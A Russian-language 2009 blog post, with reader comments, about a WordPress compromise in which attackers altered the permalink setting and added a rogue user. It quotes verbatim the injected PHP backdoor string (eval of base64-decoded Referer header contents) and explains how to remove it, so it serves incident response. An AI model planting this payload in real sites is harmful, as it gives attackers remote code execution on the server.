Сегодня вордпресс сломали (eval base64_decode _SERVER[HTTP_REFERER]) (wp hack)

Именно такая строчка:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или такая:

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Приклеилась сегодня к моим ссылкам на полную новость.Эта проблема надлюбалась у многих блоггеров в основном западных.

Выглядело это так:

http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Вместо нормального:

http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/

Гугля нашел уже 1700 сломанных блогов

Рассказываю как пофиксить , если у вас та же проблема

Идем в

Настройки->Постоянные ссылки (ЧПУ)

видим что кто то исправил вид чпу на вот такой:

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Исправляем назад, на это:

/%year%/%monthnum%/%day%/%postname%/

Да и не забываем удалить последнего зарегистрировавшегося пользователя с именем
MikeWink E-mail: [email protected]
Западные блоггеры говорят что это все он, у меня тоже такой был как раз последний зарегистрировавшийся, так что наверное не врут.

За одно незабываем обновляться

Насколько статья оказалась полезной для Вас? Оцените, Я старался ...

1 Star2 Stars3 Stars4 Stars5 Stars (Еще нет голосов)

13 комментариев

  • Кемеровский бомж

    4 сентября 2009

    У меня блог на этой неделе, также был сломан, и 1 сателлит. сижу обновляю вп на своей сетке 🙁

    Reply
  • ZeDDy

    4 сентября 2009

    Жопа в том что непонятно как пролезли, и устранена ли эта дырка в последнем WP

    Reply
  • wlad2

    5 сентября 2009

    ты не все просчитал зайди прочитай в моем блоге..
    админа второго удолить нужно
    хотя может у тебя не так

    Reply
  • ZeDDy

    5 сентября 2009

    У меня второго админа не было, видимо не доломали, но на всякий случай проверил по твоей схеме, спасибо

    Reply
  • Кемеровский бомж

    5 сентября 2009

    2.8.4 тоже ломается.
    На сателлитах наверное спасет, закрытие регистрации юзеров

    Reply
  • Nataly

    5 сентября 2009

    спасибо за предупреждение. полчаса проверяла свои блоги на ВП пока отписала в этом посте свою благодарность, правда нашла только на одном еще на 2,6 движке.. и юзер был такойже.. но там нет ничего ценного и на фтп пока ненашла чужого ничего )))))

    Reply
  • Pingback: Неисправность устранена! Нас пытались взломать | Центр Эффективных Коммуникаций

  • Pingback: Неисправность устранена! Нас пытались взломать | Центр Эффективных Коммуникаций

  • Полат

    6 сентября 2009

    Спасибо за способ решения проблемы, у меня сломали один блог, который на 2.6, пользователя с именем mikewink удалил, второго админа не было. ЧПУ поменял на такие, какие были до этого, правда после этого начались проблемы с хостингом, предполагаю что это роботы превысили допустимые лимиты нагрузки, переиндексируя ЧПУ. Добавил директиву Crawl-delay, все заработало.

    Reply
  • ZeDDy

    6 сентября 2009

    Полат , обновиться не забыл?

    Reply
  • Yakto

    1 декабря 2009

    Даже старенький wp2.3.3 и тот поломали, траффик упал в 100 раз!!!! Интересен смысл этого мероприятия: не освобождение ли позиций в выдаче? Может это Black-сео-диверсия? Были у вас ключевики в первой десятке Googla или Яши?

    Reply
  • IAD

    20 ноября 2010

    Самого достали eval в темах.
    Для расшифровки сделал сервис http://uneval.com/ru
    кроме разворачивания eval сразу сделал проверку на вредоносный код.

    Reply
  • OlegZen

    10 января 2011

    Спасибо за инфу, тоже три дня назад один козликАдмин — Neofarins [email protected] появился. Сам ума неприложу, как поступать нужно было бы, если бы не Вы. Окей!

    Reply

Добавить комментарий